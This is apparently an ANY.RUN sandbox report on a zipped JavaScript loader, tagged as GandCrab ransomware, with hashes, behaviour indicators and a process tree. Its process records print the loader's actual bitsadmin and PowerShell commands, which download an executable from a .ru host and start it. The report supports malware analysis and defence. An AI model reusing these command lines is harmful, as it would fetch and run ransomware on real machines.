General Info

File name

Love_You_2019_27201936-txt.zip

Verdict
Malicious activity
Analysis date
1/10/2019, 23:20:55
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
ransomware
gandcrab
Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v1.0 to extract
MD5

6dde1ca167ed67944fa5d13b86c6a343

SHA1

764e8aa30d7c4cf0219fef69ae4b8a7b32c769d5

SHA256

6e42ad9c545974ca943db43b964f4f0d8a36a028994dfa606118e2f14fc63532

SSDEEP

24:BkDkheN8YR9M4VDTX6FHoH+4D1mz0EtofWVWnqGbMImwjj+0e4hvTMDyJ:BkDkhi8Y9M4VDOK1mIEtOVbMbwjj+v4x

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Application was dropped or rewritten from another process
  • 2495831141.exe (PID: 2188)
  • 4177133078.exe (PID: 2580)
  • 1469420263.exe (PID: 3116)
  • 2184730977.exe (PID: 3076)
  • wincfg32svc.exe (PID: 2496)
  • 3478239163.exe (PID: 2452)
  • 3580527067.exe (PID: 3636)
  • 3327529366.exe (PID: 4092)
  • winsvcs.exe (PID: 2992)
  • winsvcs.exe (PID: 2868)
  • 495958594939.exe (PID: 4024)
  • 979574639568794.exe (PID: 3576)
Connects to CnC server
  • 3478239163.exe (PID: 2452)
Renames files like Ransomware
  • 3478239163.exe (PID: 2452)
Deletes shadow copies
  • 3478239163.exe (PID: 2452)
Changes settings of System certificates
  • 3478239163.exe (PID: 2452)
Dropped file may contain instructions of ransomware
  • 3478239163.exe (PID: 2452)
Writes file to Word startup folder
  • 3478239163.exe (PID: 2452)
Changes Security Center notification settings
  • winsvcs.exe (PID: 2992)
GandCrab keys found
  • 3478239163.exe (PID: 2452)
Downloads executable files from the Internet
  • winsvcs.exe (PID: 2868)
  • powershell.exe (PID: 3452)
Downloads executable files from IP
  • winsvcs.exe (PID: 2868)
Disables Windows Defender Real-time monitoring
  • winsvcs.exe (PID: 2992)
Actions look like stealing of personal data
  • 3478239163.exe (PID: 2452)
Disables Windows System Restore
  • winsvcs.exe (PID: 2992)
Changes the autorun value in the registry
  • 3580527067.exe (PID: 3636)
  • 979574639568794.exe (PID: 3576)
  • 3327529366.exe (PID: 4092)
Executes PowerShell scripts
  • cmd.exe (PID: 2384)
Uses BITSADMIN.EXE for downloading application
  • cmd.exe (PID: 2228)
Starts itself from another location
  • winsvcs.exe (PID: 2992)
  • 3327529366.exe (PID: 4092)
  • 3580527067.exe (PID: 3636)
  • 979574639568794.exe (PID: 3576)
Executable content was dropped or overwritten
  • winsvcs.exe (PID: 2992)
  • winsvcs.exe (PID: 2868)
  • 3580527067.exe (PID: 3636)
  • 3327529366.exe (PID: 4092)
  • 979574639568794.exe (PID: 3576)
  • powershell.exe (PID: 3452)
Adds / modifies Windows certificates
  • 3478239163.exe (PID: 2452)
Connects to SMTP port
  • wincfg32svc.exe (PID: 2496)
Creates files like Ransomware instruction
  • 3478239163.exe (PID: 2452)
Creates files in the program directory
  • 3478239163.exe (PID: 2452)
Reads the cookies of Mozilla Firefox
  • 3478239163.exe (PID: 2452)
Creates files in the user directory
  • winsvcs.exe (PID: 2868)
  • powershell.exe (PID: 3452)
  • 3478239163.exe (PID: 2452)
Executes scripts
  • WinRAR.exe (PID: 2984)
Starts CMD.EXE for commands execution
  • WScript.exe (PID: 3128)
Dropped object may contain TOR URLs
  • 3478239163.exe (PID: 2452)
Static information

TRiD
.zip | ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
10
ZipBitFlag:
null
ZipCompression:
None
ZipModifyDate:
2004:01:10 19:08:07
ZipCRC:
0xa9cadeca
ZipCompressedSize:
1122
ZipUncompressedSize:
1122
ZipFileName:
Love_You_2019_27201936-txt.js

Processes

Total processes
53
Monitored processes
19
Malicious processes
11
Suspicious processes
1

Behavior graph

[Behavior graph: process tree with download/drop/start edges. Nodes: winrar.exe, wscript.exe, cmd.exe (x2), bitsadmin.exe, powershell.exe, 979574639568794.exe, winsvcs.exe (x2), 495958594939.exe, 3580527067.exe, 3327529366.exe, wincfg32svc.exe, 3478239163.exe (tagged #GANDCRAB), 2495831141.exe, wmic.exe, 4177133078.exe, 1469420263.exe, 2184730977.exe. Nodes marked "no specs" carry no indicator flags.]
Specs description
Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

PID
2984
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_27201936-txt.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wscript.exe
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll

PID
3128
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2984.38950\Love_You_2019_27201936-txt.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll

PID
2228
CMD
"C:\Windows\System32\cmd.exe" /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe&start C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bitsadmin.exe
c:\users\admin\appdata\local\temp\495958594939.exe

PID
2384
CMD
"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3312
CMD
bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\system32\bitsadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3452
CMD
PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\windows\system32\netutils.dll

PID
3576
CMD
"C:\Users\admin\AppData\Local\Temp\979574639568794.exe"
Path
C:\Users\admin\AppData\Local\Temp\979574639568794.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll
c:\users\admin\495030305060\winsvcs.exe

PID
2868
CMD
C:\Users\admin\495030305060\winsvcs.exe
Path
C:\Users\admin\495030305060\winsvcs.exe
Indicators
Parent process
979574639568794.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\495030305060\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\3580527067.exe
c:\users\admin\appdata\local\temp\3327529366.exe
c:\users\admin\appdata\local\temp\3478239163.exe
c:\users\admin\appdata\local\temp\1469420263.exe
c:\users\admin\appdata\local\temp\2184730977.exe

PID
4024
CMD
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\495958594939.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll

PID
3636
CMD
C:\Users\admin\AppData\Local\Temp\3580527067.exe
Path
C:\Users\admin\AppData\Local\Temp\3580527067.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3580527067.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\657607470096780\winsvcs.exe

PID
4092
CMD
C:\Users\admin\AppData\Local\Temp\3327529366.exe
Path
C:\Users\admin\AppData\Local\Temp\3327529366.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3327529366.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
